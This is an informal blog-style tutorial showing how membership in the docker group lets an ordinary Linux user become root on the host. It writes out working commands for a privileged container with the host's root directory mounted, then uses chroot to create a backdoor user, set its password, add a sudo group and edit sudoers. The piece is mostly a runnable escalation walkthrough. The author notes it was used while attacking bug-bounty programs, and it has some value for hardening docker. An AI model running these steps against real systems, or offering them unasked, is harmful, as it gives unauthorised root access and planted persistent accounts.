From normal to R00T user using this simple technique !
This is not a vulnerability, this is just an showcase what happens if you give the full access to docker ?!
This is one of my technique i found on my own while pwning some private programs ;)
First we are checking if docker has full access over system !
or you check groups if docker is added or not !
If docker is present then we can be able to do our privilege escalation
For that you need any image, that could help !
- Create a Docker Container with
/Mounted
Use the --privileged flag to grant full access to the container, and mount the host's root directory into the container.
docker run -it --privileged --name root_access_container -v /:/mnt_host_root ubuntu /bin/bash--privileged: Grants all capabilities to the container, allowing full control over the host system.-v /:/mnt_host_root: This mounts the host's root (/) into the container's/mnt_host_rootdirectory.ubuntu: The base image used in the container (you can replace it with any other Linux image)./bin/bash: Starts a bash shell inside the container.
Im taking debian container, you can choose whatever images you need !
Alternately you can use this — rm command to remove the container automatically when we stop using it !
docker run -it --privileged --rm --name root_access_container -v /:/mnt_host_root ubuntu /bin/bash
2. Now that you can see we have successfully mounted our / root dir into our container. now using chroot(change root) you can directly modify the host’s files such as /etc/passwd, /etc/shadow, and /etc/group to create a new user on the host.
Example: Trying to create an new user on by using the host’s ‘useradd’ binary via the mounted root directory
i use the following command:
chroot /mnt_host_root useradd -m -s /bin/bash pwnchroot /mnt_host_rootallows you to change the root directory to the mounted host root (/mnt_host_root), effectively running commands as if you were on the host itself.useradd -m -s /bin/bash pwncreates a new user namedpwnwith a home directory and sets their shell to/bin/bash.
3. giving password:
chroot /mnt_host_root passwd pwnTHE MAIN PART BEGINS HERE ;)
4. Grant sudo Privileges to the New Host User
Trying this command : apt update and apt install sudo
Again same error ? Yeah because inside the chroot environment (i.e., the host's file system as mounted within the Docker container), the sudo group is either not present or not correctly referenced.
wait we can check it using :
chroot /mnt_host_root cat /etc/group | grep sudoSo no output, so lets create an sudo group on the host
chroot /mnt_host_root groupadd sudo
chroot /mnt_host_root usermod -aG sudo pwnAhh .. now it works perfectly !
now lets see if it works or not
Noo.. its not in the sudoers file ?!
okie lets open and edit the sudoers file and make some nerdy changes !
Uncomment the %sudo line so that we can exec commands !
Lets try again ..!
Gotcha … it worked ;) . now im a root user
Now i can do all the nerdy things that an /root user can do ..!
Thats it nerds. Thanks for reading ..!
by 5mukx
Twitter: https://x.com/5mukx
Github: https://github.com/Whitecat18
